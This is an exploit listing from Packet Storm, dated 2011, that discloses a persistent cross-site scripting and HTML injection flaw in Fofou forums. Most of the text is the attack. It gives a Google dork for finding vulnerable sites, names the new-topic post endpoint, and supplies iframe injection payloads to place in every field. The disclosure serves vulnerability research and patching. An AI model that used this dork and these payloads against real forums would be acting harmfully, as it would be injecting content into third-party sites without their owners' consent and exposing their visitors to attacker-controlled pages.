Fofou Forums Cross Site Scripting

2011-08-15T00:00:00
ID PACKETSTORM:104040
Type packetstorm
Reporter Sony
Modified 2011-08-15T00:00:00

Description

                                        
                                            `# Exploit Title: Permanent XSS and Html Code Injection in the Fofou Forums  
# Google Dork: intext:Powered by fofou  
# Date: 15.08.2011  
# Author: Sony  
# Software Link: http://blog.kowalczyk.info/software/fofou/index.html  
# Version: all version  
  
  
..............................  
.......................................................................  
  
http://www.server/forum/post  
  
New Topic: (all fields)  
  
XSS: <iframe src="http://xssed.com">  
  
Html Code Injection : <iframe width="425" height="349" src="  
http://www.youtube.com/embed/8SaeEQWkVJ0" frameborder="0"  
allowfullscreen></iframe>  
`